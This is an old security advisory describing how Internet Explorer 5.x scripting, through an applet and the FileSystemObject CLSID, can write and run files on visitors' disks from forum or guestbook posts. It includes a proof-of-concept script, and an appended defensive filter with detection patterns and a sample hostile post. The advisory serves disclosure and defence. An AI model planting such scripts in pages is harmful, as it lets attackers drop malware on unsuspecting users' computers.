From: freebrain at softhome.net (FREEBRAIN)
Subject: Internet Explorer JavaScript insecure function


* Internet Explorer JavaScript insecure function *


Product: Microsoft Internet Explorer
Version: 5.x (probably other versions may be affected)


***


Problem:

I discovered that a JavaScript function (interpreted by Internet Explorer) called "file.writeline()" may be
potentially dangerous for Internet Explorer users. This function allows writing files to a hard disk by
means of JavaScript.

An attacker may use this function by writing JavaScript code in posts on forums, guestbooks, etc. to own
his victims' computers. With the "file.writeline()" function the attacker can write trojans/viruses/etc. to his
victims' hard disks; for example, an attacker may use the JavaScript "file.writeline()" function to write
a malicious file in the VBS (Visual Basic Scripting) language.

I repeat, this may be potentially dangerous for Internet Explorer users.

NOTE: Actually, a virus in the wild that affects mIRC users is using this function ("file.writeline").

NOTE2: As you can see on the "Proof of concept", other functions are needed to carry out an "intrusion".


***


Proof of concept:

InterfaceObject=document.applets[0];
setTimeout("Write()",1000);
function Write() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder ;        
filename = "\\proof.txt";
var filecontent = "Hello world";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent)
file.close();

}

This code writes a file called "proof.txt" on the hard disk, with the content "Hello world". You can also
execute files you write by means of JavaScript by adding "Run();" to the function.


***


Solution:

I'm not sure about the solution, but I recommend upgrading to the latest version of Internet Explorer.
I also recommend that webmasters forbid HTML code that contains this function in their forums, guestbooks, etc.


***


Thanks to: 

#disidents,#hackers @ irc-phoenix.org

#disidents,#sleepx,#ayuda_internet @ irc-hispano.org

Special thanks go to: Impos

(sorry for my poor English)


***


By FREEBRAIN

FREEBRAIN is a member of DisidentS Hacker Team

http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents

<freebrain@...adoo.es>
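
The "Solution" section above asks webmasters to forbid posts that contain this function. As an added example (not part of the original post), here is one server-side way to do that for forum or guestbook input: flag the strings that appear in the proof of concept and store the post HTML-escaped so it renders as inert text. The function names, the extra indicators (object tags, event handlers, javascript: URLs) and the sample post are assumptions made for illustration.

```javascript
// Added example, not from the original post. Indicator strings come from the
// proof of concept; function names and the sample post are assumptions.
const INDICATORS = [
  ["script-tag", /<\s*script\b/i],
  ["applet-tag", /<\s*applet\b/i],
  ["object-tag", /<\s*object\b/i],
  ["event-handler", /<[^>]*\son\w+\s*=/i],
  ["javascript-url", /javascript\s*:/i],
  ["setCLSID", /\bsetCLSID\s*\(/i],
  ["fso-clsid", /0D43FE01-F093-11CF-8940-00A0C9054228/i],
  ["opentextfile", /\bopentextfile\s*\(/i],
  ["writeline", /\bwriteline\s*\(/i],
];

// Resolve numeric character references so "java&#115;cript:" is still matched.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?/gi, (m, n) => {
    const cp = /^x/i.test(n) ? parseInt(n.slice(1), 16) : parseInt(n, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
  });
}

// Escape every HTML metacharacter so the stored post renders as plain text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Returns the indicator names found (for logging/moderation) and the inert
// text to store. Escaping is the control; the flags are only a signal.
function screenPost(raw) {
  const decoded = decodeNumericEntities(raw);
  const flags = INDICATORS.filter(([, re]) => re.test(raw) || re.test(decoded))
    .map(([name]) => name);
  return { flags, safeHtml: escapeHtml(raw) };
}

// Constructed sample post, modelled on the proof of concept above.
const SAMPLE_POST =
  'Nice guestbook! <applet code="x"></applet><script>' +
  'o=document.applets[0];o.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");' +
  'f=o.createInstance().opentextfile("\\\\proof.txt","2","TRUE");' +
  'f.writeline("Hello world");f.close();</script>';

console.log(screenPost(SAMPLE_POST));
```

Matching on the function name alone is easy to sidestep, which is why the example treats the flags as a moderation signal and relies on escaping all markup for the actual protection.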